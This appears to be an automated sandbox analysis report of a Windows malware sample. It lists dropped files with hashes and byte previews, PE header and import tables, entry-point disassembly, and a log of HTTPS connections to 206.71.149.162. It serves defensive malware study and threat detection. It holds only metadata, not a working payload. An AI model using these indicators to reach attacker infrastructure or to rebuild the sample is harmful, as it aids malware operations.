                                                                                                    Size (bytes):4361165
                                                                                                    Entropy (8bit):7.995000411667346
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:98304:2zwaBU6dIESFphgbVZ0Pl0wQ/EkA0/A+jbeOA/PUteJh8Pji+yrd7/:uwa66drSF99eMjdCEs2OSl
                                                                                                    MD5:95D33059085CD2681BBB402708A6FB54
                                                                                                    SHA1:B2FA74C98643243AF35FDE71F899301045DAF422
                                                                                                    SHA-256:7C8007334E8D4E36940BD3C8933F30806F00E0240F5EB24538513738CA94148C
                                                                                                    SHA-512:051FFB35FB54F0A3044F3FD8F348095B1924B012E6F822F4F913C497265C443230EF1C9349A36DE6E1AC69BFA70B117A7667802C74FCCD90DB1BD45F76CA8E5E
                                                                                                    Malicious:false
                                                                                                    Preview:PK.........k.W.f7Sc.B..._.....lp11..w\.g.8n.4...}.0t.I..K..+ .(.............f.{7...d..&...lz,..XbLb..E..y..h.&........3.9.<...<...t.$HJ..........._....=.p...|.../B...3g_.......^.+...f..V..[i1[.*4..MU.z..6;WY.~}.tY./`...Sv.....gOP...^m...Y..M..]...`...2Xc".. ......'..l.1<.[."8,. ...@.....>...P[R.S.v....iN.og.3..~....3..[....}......U...;|.... .`-b..3O....JVi...5<.......B.v.....69...%.....`...$.H.........Z.6...[~...U.........?...i8..\.....I..v.'.oM?.g.t..Z.v..#?A...ee......U&e.I...Y..@G.O..2Y,J..."..............'4.l.}z......|.C.(Q@te.V^.....J(.!.K.&...Z[Fe.M..^....!h.DS."VYf.......4i4&a..r..h..E.....`...*.y..F;|y........./0..5):.M5..C.|..|.x....(.S....}...g..$.j....4. ..ED.1.@oV.......C.1./.,..eF......MV..UeU"...*K7<0......k<.B\...,.M.1D..(]c.~D.#B....P./p.~...,..z..m@.3.^J...+.<.....'.s;.Ey..JU9:............j..D...F..,.:.....|BQ..X..2.63.OR..j....0."..0...j.A1.6..$..>r..*S......Y.i.Fu.Ff.....t.s..Pqf.V.N.......d.-$.`.....ct.UH...1....~q.5F9.o...
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6268929
                                                                                                    Entropy (8bit):7.481378985443105
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:98304:SkMdmYyU9wpjEyYOsESNTQGizsZT+Yqr5WlHM0uzZ5qCq01D/d83abo8P1pb8P10:SxPyWwpjz3OGfolHjz09d8GK/t2p
                                                                                                    MD5:450B07DAC0AC61A5F472EDB8D1388FB4
                                                                                                    SHA1:1BC78645F065160D7C8EF303FB7C54CD675A91FA
                                                                                                    SHA-256:E65C5B198D5B51945875ADCE98E36FB2DC1B00FF03BE6152D5F335F15C32B532
                                                                                                    SHA-512:8FBE63D331FB7CEC246945556AC036FB108D4996839FA1B85EF751A09983985046BA74C948D3BAD3D21D37C85EFACF726EDE8A3D33C850676244AD360F394BAD
                                                                                                    Malicious:false
                                                                                                    Preview:.bpg.....!.$.............Y.5......................................*.*<...8..f.=..i~..9.....v.7....<..5...9.....5m..LL(&AU........................................................................................................................................ka..a.!..5.............. ..1.XO...@......pQ..&...zO...U..(..............".........}...........U...)..\....'..*......'.............Q.Qa....T...A..................LT..i...........................>L./.....................O..&....N.C$..................G......./.M..,....K.................5..xG........<...LQ..<...6O.............5..xG~|.~........|Q......\O.............U...G|......ov...lS......HQ.................G..}....K[....S..Z...HQ.............U...G~..~.v.A"....T.."....Q.............U...G.......[....,T.......Q.................G..}..../....<T.......Q.............U..XG........k...LT..j....Q.............U..ZG.........=...X...;...U.............U..X..............}.......z.............U..X.......................................................
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):267794
                                                                                                    Entropy (8bit):7.99933119517405
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:6144:9TIoIt5S0jIL2pILYRzDJKzlPlC8yc0jNXOvcce0HNu/+BfrB:oS0IMI+zDozlPY8X0x+Ze0c/+j
                                                                                                    MD5:3750FDEF2AA69A5B89918DAA4AAF8790
                                                                                                    SHA1:58DD9F8A0A26FE592F24EC0AAD2477917D6A470A
                                                                                                    SHA-256:A5FA7D12B661596B94F9A67E7E7563F7AF78C16F88B09CC335B55F6D7A01CA90
                                                                                                    SHA-512:629454C36A3F68282BE5D547FF3AAFCAE6334627D3CCCA5776EA1846313306571EEB34F427FDFA22CAC08C19CC5C499B1B36421D567E32F0F1669381587AA71B
                                                                                                    Malicious:false
                                                                                                    Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M........+..M...F.f.q..R,..].>>.r.nw.i@.../9...w.6..;..$dr..yO.n....-.....qH..O....?@....L.9"...]g....x.|_.1N(...+..........................kC.R......%x....}...q..U-...(....%....V..?p.h.....l)".N.#.R......v.k@3.Q..\...I.h...%D'7...Y.....6(..)w....+...........7.`....8.u....h..0p.R%. Z....^-.B..=H.{.X.............}................5..m.....,..r..5...x...(nU.j....06.f".].X.:..)...~E.........,.r.Iy..S....e........=.....b'<...1...Lu]...D...v. .2.....Ld.?..[.%....j[.O.yL^?......O\...\2F{..}..J..3...0.j.".}..f..&..=..[.v.|~..w.~.'..^.I.....g.....p.hYx......h....&.K.XP...vy.4..&..ro...j.....{.'....x.l..CA.4?w.i9.M.Y..[S...B;Un.jsI..^...z.W.F....b.@i..@...K.?....._...T.$.%.y...~....Kqr~..df..B.....Bg..1,.?w.a_Y$g......?')0......+/z.&.x;...8.|s].u....V....!....}.5i.Iyk.,IZt..6};.l.O5..dL_J..;bC\...5...*.v......|...g?BR....4.h..X[...#H.zx.;....
                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):947288
                                                                                                    Entropy (8bit):6.629681466265794
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                                    MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                    SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                                    SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                                    SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                                    • Antivirus: Virustotal, Detection: 10%, Browse
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: new_order_inquire_#2308.exe, Detection: malicious, Browse
                                                                                                    • Filename: DOC001.exe, Detection: malicious, Browse
                                                                                                    • Filename: IDESA_cotizacion.exe, Detection: malicious, Browse
                                                                                                    • Filename: Kms_P1co.zip, Detection: malicious, Browse
                                                                                                    • Filename: 7SUpFOJ22H.exe, Detection: malicious, Browse
                                                                                                    • Filename: Payment2023.png.lnk, Detection: malicious, Browse
                                                                                                    • Filename: Nestle_0093266.exe, Detection: malicious, Browse
                                                                                                    • Filename: MJmNRo1rSC.exe, Detection: malicious, Browse
                                                                                                    • Filename: Especificaci#U00f3n_Cotizaci#U00f3n_DOC6467.exe, Detection: malicious, Browse
                                                                                                    • Filename: DHL_DOCUMENTS.exe, Detection: malicious, Browse
                                                                                                    • Filename: 16904941841bdcd529d18d1719e97bd155d650a7d3789c12cda2bd13eb568705155674f42c725.dat-decoded.exe, Detection: malicious, Browse
                                                                                                    • Filename: RFQ.exe, Detection: malicious, Browse
                                                                                                    • Filename: KTkoS5DGmy.exe, Detection: malicious, Browse
                                                                                                    • Filename: Latest_Setup.exe, Detection: malicious, Browse
                                                                                                    • Filename: documentoFactura1.jse, Detection: malicious, Browse
                                                                                                    • Filename: documentoFactura1.jse, Detection: malicious, Browse
                                                                                                    • Filename: SUNAT_Documento3345278.cmd, Detection: malicious, Browse
                                                                                                    • Filename: setup.exe, Detection: malicious, Browse
                                                                                                    • Filename: setup.exe, Detection: malicious, Browse
                                                                                                    • Filename: doc_Factura_568947.rar, Detection: malicious, Browse
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):5.701011112526351
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:dGuYmJNS1K.exe
                                                                                                    File size:1'049'600 bytes
                                                                                                    MD5:897af5616bfd6af5b687876924f39ee3
                                                                                                    SHA1:d560fdaed07146a1b4fa519ae023bfa61c1594a6
                                                                                                    SHA256:8a013b99a9b82e0f67b3e472f7627052915507916311f10cac5b69e87f3d19d4
                                                                                                    SHA512:36aa88852ed1589b51ae8a49c01792acc2f6f648bfa45fbaefaaf7055bd79517ce2f3b9471a5dfb4d652cf336674231f2d5b7d985a69e4d6aa719b623dc1a823
                                                                                                    SSDEEP:12288:Tq73genXXHoA/of0L4enXXHoA/of0LOOR1:uZnR/eUhnR/eUOG
                                                                                                    TLSH:70255D51E096113AFDD87A340092B1A53B02DE7F19429DBECCCBEACBC54626329D5C9F
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2.C]v.-.v.-.v.-.=...|.-.=.(...-.=.).b.-...(.P.-...).d.-.....b.-.=.,.q.-.v.,...-...$.w.-.....w.-.v...w.-.../.w.-.Richv.-........
                                                                                                    Icon Hash:a8a87a3396d251cc
                                                                                                    Entrypoint:0x4015f8
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x6531D41C [Fri Oct 20 01:13:00 2023 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:6
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:6
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:6
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:e957e1fac34ad27ace053a2e67ea5b97
                                                                                                    Instruction
                                                                                                    call 00007F3A74D9604Ah
                                                                                                    jmp 00007F3A74D95AFFh
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    push 00000000h
                                                                                                    call dword ptr [0041004Ch]
                                                                                                    push dword ptr [ebp+08h]
                                                                                                    call dword ptr [00410048h]
                                                                                                    push C0000409h
                                                                                                    call dword ptr [00410050h]
                                                                                                    push eax
                                                                                                    call dword ptr [00410054h]
                                                                                                    pop ebp
                                                                                                    ret
                                                                                                    push ebp
                                                                                                    mov ebp, esp
                                                                                                    sub esp, 00000324h
                                                                                                    push 00000017h
                                                                                                    call dword ptr [00410058h]
                                                                                                    test eax, eax
                                                                                                    je 00007F3A74D95C87h
                                                                                                    push 00000002h
                                                                                                    pop ecx
                                                                                                    int 29h
                                                                                                    mov dword ptr [004179D8h], eax
                                                                                                    mov dword ptr [004179D4h], ecx
                                                                                                    mov dword ptr [004179D0h], edx
                                                                                                    mov dword ptr [004179CCh], ebx
                                                                                                    mov dword ptr [004179C8h], esi
                                                                                                    mov dword ptr [004179C4h], edi
                                                                                                    mov word ptr [004179F0h], ss
                                                                                                    mov word ptr [004179E4h], cs
                                                                                                    mov word ptr [004179C0h], ds
                                                                                                    mov word ptr [004179BCh], es
                                                                                                    mov word ptr [004179B8h], fs
                                                                                                    mov word ptr [004179B4h], gs
                                                                                                    pushfd
                                                                                                    pop dword ptr [004179E8h]
                                                                                                    mov eax, dword ptr [ebp+00h]
                                                                                                    mov dword ptr [004179DCh], eax
                                                                                                    mov eax, dword ptr [ebp+04h]
                                                                                                    mov dword ptr [004179E0h], eax
                                                                                                    lea eax, dword ptr [ebp+08h]
                                                                                                    mov dword ptr [004179ECh], eax
                                                                                                    mov eax, dword ptr [ebp-00000324h]
                                                                                                    mov dword ptr [00417928h], 00010001h
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x15bfc0x50.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x190000xe98c0.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1030000xfb8.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x14fe80x70.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x14f280x40.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x100000x184.rdata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x10000xe57e0xe600False0.6135699728260869data6.563275106374818IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rdata0x100000x649c0x6600False0.4186197916666667data4.832945204684908IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .data0x170000x15ac0xa00False0.152734375data2.034690130097456IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .rsrc0x190000xe98c00xe9a00False0.3653524612092028data5.5307728708308845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x1030000xfb80x1000False0.77294921875data6.470326556002081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_BITMAP0x6fd080x92a00Device independent bitmap graphic, 542 x 277 x 32, image size 600536EnglishUnited States0.09073456148763853
                                                                                                    RT_ICON0x192b00x2b450Device independent bitmap graphic, 207 x 414 x 32, image size 171396EnglishUnited States0.8298839938611537
                                                                                                    RT_ICON0x447180x2b450Device independent bitmap graphic, 207 x 414 x 32, image size 171396EnglishUnited States0.8298839938611537
                                                                                                    RT_MENU0x6fb800x4adataEnglishUnited States0.8648648648648649
                                                                                                    RT_DIALOG0x6fbe00x128dataEnglishUnited States0.6081081081081081
                                                                                                    RT_STRING0x1027080x34dataEnglishUnited States0.5192307692307693
                                                                                                    RT_ACCELERATOR0x6fbd00x10dataEnglishUnited States1.25
                                                                                                    RT_GROUP_ICON0x447000x14dataEnglishUnited States1.2
                                                                                                    RT_GROUP_ICON0x6fb680x14dataEnglishUnited States1.25
                                                                                                    RT_MANIFEST0x1027400x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                    DLLImport
                                                                                                    USER32.dllShowWindow, GetMessageW, DefWindowProcW, DestroyWindow, MessageBoxW, CreateWindowExW, EndDialog, RegisterClassExW, LoadAcceleratorsW, LoadStringW, BeginPaint, DispatchMessageW, TranslateAcceleratorW, TranslateMessage, LoadIconW, LoadCursorW, PostQuitMessage, DialogBoxParamW, UpdateWindow, LoadImageW
                                                                                                    GDI32.dllSelectObject, CreateCompatibleDC, GetObjectW, BitBlt
                                                                                                    KERNEL32.dllSetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, GetProcessHeap, LCMapStringW, CompareStringW, CreateFileW, WriteConsoleW, DecodePointer, HeapSize, RaiseException, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapFree, CloseHandle, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetFileAttributesExW, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetFileType, GetStringTypeW
                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                    EnglishUnited States
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 24, 2023 06:55:17.679820061 CEST49737443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:17.679871082 CEST44349737206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:17.679938078 CEST49737443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:17.695286989 CEST49737443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:17.695302963 CEST44349737206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:18.052529097 CEST44349737206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:18.052668095 CEST49737443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:18.142723083 CEST49737443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:18.142756939 CEST44349737206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:18.143804073 CEST44349737206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:18.143975019 CEST49737443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:18.148178101 CEST49737443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:18.194461107 CEST44349737206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:18.370417118 CEST44349737206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:18.370515108 CEST44349737206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:18.370536089 CEST49737443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:18.370614052 CEST49737443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:18.376287937 CEST49737443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:18.376323938 CEST44349737206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:18.378245115 CEST49738443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:18.378288984 CEST44349738206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:18.378371954 CEST49738443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:18.378833055 CEST49738443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:18.378842115 CEST44349738206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:18.725766897 CEST44349738206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:18.725852966 CEST49738443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:18.726342916 CEST49738443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:18.726352930 CEST44349738206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:18.726695061 CEST49738443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:18.726700068 CEST44349738206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:19.067732096 CEST44349738206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:19.067804098 CEST44349738206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:19.067841053 CEST49738443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:19.067871094 CEST44349738206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:19.067886114 CEST49738443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:19.067914009 CEST49738443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:19.233705997 CEST44349738206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:19.233771086 CEST44349738206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:19.233861923 CEST49738443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:19.233889103 CEST44349738206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:19.233927011 CEST44349738206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:19.233966112 CEST49738443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:19.233983040 CEST49738443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:19.243599892 CEST49738443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:19.243628025 CEST44349738206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:19.696221113 CEST49739443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:19.696269989 CEST44349739206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:19.696343899 CEST49739443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:19.696878910 CEST49739443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:19.696897984 CEST44349739206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:20.039067984 CEST44349739206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:20.039175987 CEST49739443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:20.078126907 CEST49739443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:20.078138113 CEST44349739206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:20.078582048 CEST49739443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:20.078588009 CEST44349739206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:20.369945049 CEST44349739206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:20.370035887 CEST49739443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:20.370038033 CEST44349739206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:20.370091915 CEST49739443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:20.371419907 CEST49739443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:20.371438026 CEST44349739206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:20.447151899 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:20.447191000 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:20.447282076 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:20.447859049 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:20.447874069 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:20.797532082 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:20.797662020 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:20.798535109 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:20.798547983 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:20.798883915 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:20.798890114 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.131869078 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.131937981 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.131978035 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.132009983 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.132025957 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.132054090 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.299052000 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.299145937 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.299635887 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.299710989 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.300055981 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.300123930 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.466533899 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.466751099 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.466787100 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.466854095 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.467312098 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.467381954 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.467711926 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.467775106 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.468128920 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.468199015 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.468568087 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.468633890 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.469038010 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.469105005 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.634243965 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.634360075 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.634510040 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.634670019 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.634788990 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.634845972 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.635160923 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.635224104 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.635565042 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.635629892 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.635957956 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.636028051 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.636616945 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.636682987 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.637207985 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.637273073 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.637645006 CEST44349740206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:21.637708902 CEST49740443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:21.638016939 CEST44349740206.71.149.162192.168.2.4
